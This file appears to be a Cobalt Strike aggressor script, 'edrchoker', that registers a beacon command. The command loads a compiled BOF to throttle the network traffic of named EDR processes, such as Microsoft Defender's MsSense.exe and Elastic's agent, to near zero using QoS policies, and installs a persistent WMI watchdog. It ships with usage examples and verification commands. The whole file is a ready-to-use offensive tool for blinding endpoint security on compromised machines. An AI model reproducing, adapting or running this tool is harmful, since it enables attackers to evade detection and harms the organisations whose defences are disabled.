# edrchoker.cna
#
# Usage:
#   edrchoker add        "proc1.exe;proc2.exe"   throttle + WMI watchdog
#   edrchoker remove     "proc1.exe;proc2.exe"   restore specific processes
#   edrchoker remove_all                         restore all + remove watchdog
#   edrchoker list                               show active policies + watchdog

alias edrchoker {
    local('$bof $args $bid $handle $path $cmd $procs');
    $bid = $1;
    $cmd = $2;

    if ($cmd is $null || $cmd eq "") {
        berror($bid, "[edrchoker] usage: edrchoker <add|remove|remove_all|list> [procs]");
        return;
    }

    $procs = "";

    if ($cmd eq "add" || $cmd eq "remove") {
        if (size(@_) < 3 || $3 eq "") {
            berror($bid, "[edrchoker] " . $cmd . " requires a process list: \"proc1.exe;proc2.exe\"");
            return;
        }
        $procs = $3;
    }

    $path   = script_resource("edrchoker.x64.o");
    $handle = openf($path);
    if ($handle is $null) { berror($bid, "[edrchoker] cannot open BOF"); return; }
    $bof = readb($handle, 1048576);
    closef($handle);
    if ($bof is $null) { berror($bid, "[edrchoker] readb failed"); return; }

    if ($procs ne "") {
        btask($bid, "EDRChoker: " . $cmd . " " . $procs);
    } else {
        btask($bid, "EDRChoker: " . $cmd);
    }

    $args = bof_pack($bid, "zz", $cmd, $procs);
    beacon_inline_execute($bid, $bof, "go", $args);
}

beacon_command_register(
    "edrchoker",
    "Throttle EDR processes to ~0 bps via QoS pacer.sys + persistent WMI watchdog",
    "Usage:\n" .
    "  edrchoker add        \"p1.exe;p2.exe\"   throttle + install WMI watchdog\n" .
    "  edrchoker remove     \"p1.exe;p2.exe\"   restore network for specific processes\n" .
    "  edrchoker remove_all                   restore ALL QoS policies + remove watchdog\n" .
    "  edrchoker list                         show active policies + watchdog status\n\n" .
    "Examples:\n" .
    "  edrchoker add    \"MsSense.exe;elastic-endpoint.exe\"\n" .
    "  edrchoker remove \"MsSense.exe\"\n" .
    "  edrchoker remove_all\n" .
    "  edrchoker list\n\n" .
    "Verify:\n" .
    "  Get-WmiObject -Ns ROOT\\StandardCimv2 -Class MSFT_NetQosPolicySettingData\n" .
    "  Get-WmiObject -Ns ROOT\\subscription  -Class __EventFilter"
);
